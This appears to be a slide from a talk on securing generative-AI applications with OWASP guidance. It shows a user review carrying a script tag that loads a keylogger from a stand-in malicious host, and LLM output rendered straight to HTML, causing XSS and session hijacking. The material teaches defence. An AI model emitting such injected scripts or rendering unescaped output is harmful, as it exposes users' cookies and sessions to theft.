Securing GenAI Application with OWASP Frameworks
Attack Vectors Example
Scenario: AI generates product descriptions and HTML
Database contains: Product info, user reviews, pricing
User Review Contain:
These headphones are amazing! Highly recommend. <script src='https://malicious-site.com/keylogger.js'></script>
Attack:
prompt = "Generate product page for wireless headphones"
output = llm.generate(prompt)
app.render_html(output)
Impact: XSS attack steals user cookies, session hijacking